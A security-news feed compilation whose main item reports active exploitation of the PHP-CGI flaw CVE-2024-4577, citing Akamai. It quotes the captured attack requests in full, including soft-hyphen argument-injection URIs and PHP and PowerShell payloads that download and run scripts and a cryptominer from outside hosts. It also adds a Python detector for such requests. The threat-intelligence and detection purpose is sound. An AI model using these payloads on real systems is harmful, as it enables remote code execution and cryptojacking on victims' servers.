Proton makes its open source Proton Pass password manager globally available for major browsers and mobile devices.
The post Proton Launches Open Source Password Manager appeared first on SecurityWeek.
SecurityWeek RSS Feed
Critical PHP Vulnerability CVE-2024-4577 Actively Exploited in the Wild
A critical vulnerability in PHP, tracked as CVE-2024-4577, is being actively exploited by threat actors in the wild just days after its public disclosure in June 2024. The flaw affects PHP installations running in CGI mode, primarily on Windows systems using Chinese and Japanese language locales, though it may impact a wider range of setups.
The Akamai Security Intelligence Response Team (SIRT) has detected numerous exploit attempts targeting this vulnerability within 24 hours of its disclosure. The ease of exploitation has led to quick adoption by various threat actors.
"One of the factors in determining criticality is the ease of exploitation, and this one is pretty uncomplicated for a threat actor to execute. To achieve RCE, an attacker just needs to send PHP code to the server and have it be (mis)interpreted," Akamai said.
Akamai researchers have observed the flaw being abused in multiple malware campaigns, including:
Gh0st RAT: A 15-year-old remote access tool was used in attacks originating from a server in Germany. The malware renamed itself and beaconed out to a command-and-control server.
RedTail Cryptominer: A cryptomining operation was detected abusing the vulnerability to retrieve and execute a shell script that downloads an x86 RedTail cryptomining malware.
Muhstik Malware: Another campaign downloaded a variant of Muhstik malware, which targets IoT devices and Linux servers for cryptomining and DDoS purposes.
XMRig: PowerShell was used to download and execute a script that spins up the XMRig cryptominer from a remote mining pool.
Within 24 hours of disclosure, SIRT observed Gh0st RAT malware attempts targeting this vulnerability. The malware, a UPX-packed Windows executable, beacons out to a Germany-based command-and-control server and renames itself to evade detection.
SIRT honeypots detected a RedTail cryptomining operation exploiting CVE-2024-4577. The attacker used a shell script to download and execute the cryptomining malware from a Russia-based IP address.
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
URI:
/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
POST DATA:
<?php shell_exec("SC=$(wget -O- http://185.172.128[.]93/sh || curl http://185.172.128[.]93/sh); echo \"$SC\" | sh -s cve_2024_4577"); ?>
Another campaign involved a shell script downloading Muhstik malware, which targets Internet of Things and Linux servers for cryptomining and distributed denial-of-service (DDoS) attacks.
User-Agent: python-requests/2.22
URI:
/?%ADd+allow_url_include%3D1+-d+auto_prepend_file%3Dphp://input
POST DATA:
<?php system('curl 86.48.2[.]49/3sh')?>;echo 1337; die;
A fourth campaign involved XMRig, where PowerShell commands were used to download and execute a script to spin up the cryptominer from a remote mining pool.
URI:
/test.hello?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input
POST DATA (Base64 Encoded):
<?php $cmd=base64_decode('cG93ZXJzaGVsbCAtQ29tbWFuZCAiJHdjID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsgJHRlbXBmaWxlID0gW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcEZpbGVOYW1lKCk7ICR0ZW1wZmlsZSArPSAnLmJhdCc7ICR3Yy5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9kb3dubG9hZC5jM3Bvb2wub3JnL3htcmlnX3NldHVwL3Jhdy9tYXN0ZXIvc2V0dXBfYzNwb29sX21pbmVyLmJhdCcsICR0ZW1wZmlsZSk7ICYgJHRlbXBmaWxlIDQ5dzhnc0x3N1V3VVZzelVCdFl1amROMU1jTmtvZVl1Y1RjdGFlUFg4bm1iaktBQnpKOVMxcmlnV2RoNUVpVVQxejROUEFQY2h4VDdSYUpYTjNmVVJVcE02RjZLR2p5OyBSZW1vdmUtSXRlbSAtRm9yY2UgJHRlbXBmaWxlIg==');system($cmd) ?>
POST DATA (Base64 Decoded):
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://download.c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.bat', $tempfile); & $tempfile 49w8gsLw7UwUVszUBtYujdN1McNkoeYucTctaePX8nmbjKABzJ9S1rigWdh5EiUT1z4NPAPchxT7RaJXN3fURUpM6F6KGjy; Remove-Item -Force $tempfile"
Akamai advises affected organizations to patch their systems swiftly and monitor for indicators of compromise (IOCs).
Those using manual mode should ensure the Command Injection Attack group or specific relevant rules are set to “Deny” mode. Akamai has observed a surge in scanning for this vulnerability and is continuing to monitor the situation closely.
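Every request sample above carries the same tell: a percent-encoded soft hyphen (%AD) that php-cgi on an affected Windows locale maps to a plain hyphen, turning "%ADd" into the "-d" option and smuggling allow_url_include and auto_prepend_file into the process. The detector below is an added example, not Akamai's code; it applies that mapping to the query string of each access-log line and flags requests that inject INI directives, while leaving a soft hyphen inside an ordinary parameter value alone. The log lines are constructed; only the request URIs come from the article.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed access-log lines (CLF style). The request targets repeat the
# URIs quoted in the article; client addresses, timestamps and sizes are made up.
SAMPLE_LOG = """\
203.0.113.10 - - [07/Jun/2024:10:01:02 +0000] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 512
203.0.113.11 - - [07/Jun/2024:10:01:03 +0000] "POST /?%ADd+allow_url_include%3D1+-d+auto_prepend_file%3Dphp://input HTTP/1.1" 200 87
203.0.113.12 - - [07/Jun/2024:10:01:04 +0000] "POST /test.hello?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 200 2048
198.51.100.7 - - [07/Jun/2024:10:02:00 +0000] "GET /index.php?page=home&lang=en-US HTTP/1.1" 200 3011
198.51.100.8 - - [07/Jun/2024:10:02:05 +0000] "GET /search.php?q=soft%ADhyphen HTTP/1.1" 200 900
"""

REQ_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"')
# Once 0xAD has been mapped to '-', an injected php-cgi option reads "-d name=value".
OPTION_RE = re.compile(rb"-d[\s+]+([A-Za-z_.]+)=")


def raw_query(target: str) -> bytes:
    """Percent-decode the query string to bytes, so %AD stays a single 0xAD byte."""
    return unquote_to_bytes(target.partition("?")[2])


def mapped_query(target: str) -> bytes:
    """Apply the best-fit mapping of U+00AD (soft hyphen) to '-' that php-cgi sees on affected locales."""
    return raw_query(target).replace(b"\xad", b"-")


def injected_directives(target: str) -> list[str]:
    """Names of INI directives the request would inject via -d, after the mapping."""
    return [m.group(1).decode("ascii").lower() for m in OPTION_RE.finditer(mapped_query(target))]


def scan_log(text: str) -> list[dict]:
    hits = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        directives = injected_directives(m.group("target"))
        if not directives:
            continue  # a lone soft hyphen inside a parameter value is not an injection
        hits.append({
            "client": line.split()[0],
            "directives": directives,
            "soft_hyphen": b"\xad" in raw_query(m.group("target")),
            # The pair used by every campaign above: include php://input, then prepend it.
            "high_confidence": {"allow_url_include", "auto_prepend_file"} <= set(directives),
        })
    return hits


if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

Run it over a real access log by reading the file into scan_log; a hit with soft_hyphen set and high_confidence true is the exact request shape this article documents.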
The post Critical PHP Vulnerability CVE-2024-4577 Actively Exploited in the Wild appeared first on Cyber Security News.
MITRE releases new list of top 25 most dangerous software bugs
MITRE shared today this year's list of the top 25 most dangerous weaknesses plaguing software during the previous two years.
BleepingComputer
Google fixes Chrome zero-days exploited at Pwn2Own 2024
Google fixed seven security vulnerabilities in the Chrome web browser on Tuesday, including two zero-days exploited during the Pwn2Own Vancouver 2024 hacking competition.
BleepingComputer